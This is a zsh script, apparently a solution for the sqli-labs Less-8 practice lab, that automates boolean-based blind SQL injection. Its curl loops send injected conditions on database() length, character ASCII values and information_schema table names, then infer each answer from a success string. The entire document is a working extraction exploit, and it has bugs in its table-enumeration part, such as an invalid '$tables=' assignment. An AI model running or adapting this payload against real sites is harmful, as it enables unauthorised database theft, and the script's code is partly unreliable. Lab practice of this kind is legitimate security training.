#!/bin/zsh

flag="You are in..........."

IP="115"
US="http://192.168.3.${IP}/sqli-labs/Less-8/?id=1%27and%20"
UE=",1,0)%23"
dbs=0
# 0. db lengthZZ

function get_length() {
  # $1 is sql prefix + num ?
  # $2 is sql suffix
  local l=0
  local a=$US$1

  for i in {1..15} 
  do
    url=$a$i$UE
    # status 0 表示正常退出
    curl -s "${url}" | grep -q "$flag"
    if [ $? -eq 0 ];then
      l=$i
      break
    fi 
  done
  echo $l
}

a="if(length(database())="

dbs=$(get_length $a)
echo "db length: $dbs"


# 1. db name

function get_name() {
  # $1 是 n
  # $2 is sql prefix
  # $3 is sql mid
  local name=""
  local a=$US$2
  local b=$3
  local c=$UE

  for i in {1..$1} 
  do
    for j in {97..122}
    do
      # a i b j c
      url=$a$i$b$j$c
      # status 0 表示正常退出
      curl -s "${url}" | grep -q "$flag"
      if [ $? -eq 0 ];then
        name="$name"`echo $j | awk '{printf("%c", $1)}'`
        break
      fi
    done
  done
  echo $name
}

dba="if(ascii(substr(database(),"
dbb=",1))="
db=""

db=$(get_name $dbs $dba $dbb)

echo "db is: ${db}"


# 3. tables
tbs=0
a="if((select%20length(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27%20limit%200,1)="

tbs=$(get_length $a)

echo "tbs : $tbs"

# 4. table_name

tables=
ta1="if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),"
ta1=${ta1//\ /%20}

# b 前代表 字符串index, b 后代表 ascii
ta="if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit "
ta=${ta//\ /%20}
tb=",1),"
tc=",1))="

function get_tables() {

  # $1 is length
  # $2 is sqla
  # $3 is sqlb

  for i in {0..$1}
  do
      a=$2$i$3
      # get table name length & to name
      $tables=$tables" "$(get_name $1 $a $4)
  done
}
get_tables $tbs $ta $tb $tc

echo "tables: $tables"
